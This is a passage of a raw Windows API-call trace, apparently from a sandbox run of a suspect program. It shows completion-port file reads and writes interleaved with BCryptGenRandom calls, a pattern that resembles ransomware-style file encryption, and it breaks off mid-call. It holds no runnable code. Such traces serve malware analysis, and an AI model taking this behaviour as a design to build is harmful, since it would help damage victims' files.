[0138.565] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0138.578] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1714, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0138.588] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0138.622] WriteFile (in: hFile=0xec, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x2d20, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0138.622] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0138.628] WriteFile (in: hFile=0x308, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x12c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0138.628] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0138.673] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x3de0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0138.674] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0138.683] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x3a20, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0138.684] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0138.686] CloseHandle (hObject=0x308) returned 1 [0138.691] free (_Block=0x3d70450) [0138.691] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0138.742] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x1f40, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0138.743] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0138.747] ReadFile (in: hFile=0x3cc, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0xb54, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0138.747] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0138.756] ReadFile (in: hFile=0xec, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x2d40, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0138.763] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0138.769] ReadFile (in: hFile=0x338, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x42a4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0138.777] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0138.777] CloseHandle (hObject=0x338) returned 1 [0138.777] free (_Block=0x3ef0008) [0138.777] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0138.780] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x22a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0138.780] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0138.815] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x3060, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0138.816] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0138.825] ReadFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x1364, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0138.828] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0138.836] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.837] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.837] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0138.837] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.837] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.837] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0138.837] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0138.837] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0138.837] free (_Block=0x3e305b8) [0138.837] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0138.837] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0138.838] free (_Block=0x1fa91d0) [0138.838] free (_Block=0x77d7a8) [0138.838] free (_Block=0x1fa90b8) [0138.838] WriteFile (in: hFile=0x308, lpBuffer=0x3ef003c, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0138.838] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0138.846] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.846] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.846] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0138.847] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.847] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.847] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0138.847] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0138.847] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0138.847] free (_Block=0x3e305b8) [0138.847] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0138.847] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0138.848] free (_Block=0x1fa91d0) [0138.848] free (_Block=0x77d7a8) [0138.848] free (_Block=0x1fa90b8) [0138.848] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0138.848] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0138.861] CloseHandle (hObject=0x308) returned 1 [0138.861] free (_Block=0x3ef0008) [0138.861] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0138.870] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.871] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.871] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0138.871] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.871] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.871] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0138.871] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0138.871] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0138.871] free (_Block=0x3e305b8) [0138.871] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0138.871] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0138.872] free (_Block=0x1fa91d0) [0138.872] free (_Block=0x77d7a8) [0138.872] free (_Block=0x1fa90b8) [0138.872] WriteFile (in: hFile=0xec, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0138.872] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0138.878] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.879] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.879] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0138.879] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.879] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.879] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0138.880] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0138.880] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0138.880] free (_Block=0x3e305b8) [0138.880] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0138.880] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0138.880] free (_Block=0x1fa91d0) [0138.880] free (_Block=0x77d7a8) [0138.880] free (_Block=0x1fa90b8) [0138.880] WriteFile (in: hFile=0x308, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0138.880] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0138.901] CloseHandle (hObject=0xec) returned 1 [0138.901] free (_Block=0x3d70450) [0138.901] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0138.912] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0xd00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0138.912] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0141.559] WriteFile (in: hFile=0xec, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x2b70, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0141.560] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0141.570] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.571] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.571] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0141.571] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.571] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.571] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0141.572] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0141.572] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0141.572] free (_Block=0x3e305b8) [0141.572] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0141.572] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0141.572] free (_Block=0x1fa91d0) [0141.572] free (_Block=0x77d7a8) [0141.572] free (_Block=0x1fa90b8) [0141.572] WriteFile (in: hFile=0x308, lpBuffer=0x3ef003c, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0141.573] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0141.580] CloseHandle (hObject=0x3cc) returned 1 [0141.581] free (_Block=0x3d70450) [0141.581] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0141.588] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x99c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0141.588] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0141.619] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x1030, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0141.619] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0141.629] WriteFile (in: hFile=0x338, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x3e10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0141.629] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0141.637] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.638] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.638] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0141.638] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.638] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.638] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0141.639] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0141.639] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0141.639] free (_Block=0x3e305b8) [0141.639] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0141.639] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0141.639] free (_Block=0x1fa91d0) [0141.639] free (_Block=0x77d7a8) [0141.639] free (_Block=0x1fa90b8) [0141.639] WriteFile (in: hFile=0x308, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0141.640] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0141.644] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x2a70, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0141.645] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0141.646] WriteFile (in: hFile=0x308, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x2c20, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0141.646] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0141.942] ReadFile (in: hFile=0xec, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x1374, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0141.951] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0141.965] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0xbe0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0141.965] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0141.973] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.973] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.973] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0141.973] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.974] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.974] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0141.974] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0141.974] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0141.974] free (_Block=0x3e305b8) [0141.974] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0141.974] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0141.974] free (_Block=0x1fa91d0) [0141.974] free (_Block=0x77d7a8) [0141.975] free (_Block=0x1fa90b8) [0141.975] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0141.975] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0141.978] WriteFile (in: hFile=0x170, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x1f40, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0141.978] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0141.988] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.989] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.989] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0141.989] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.989] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.989] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0141.989] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0141.989] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0141.990] free (_Block=0x3e305b8) [0141.990] calloc (_Count=0x41, 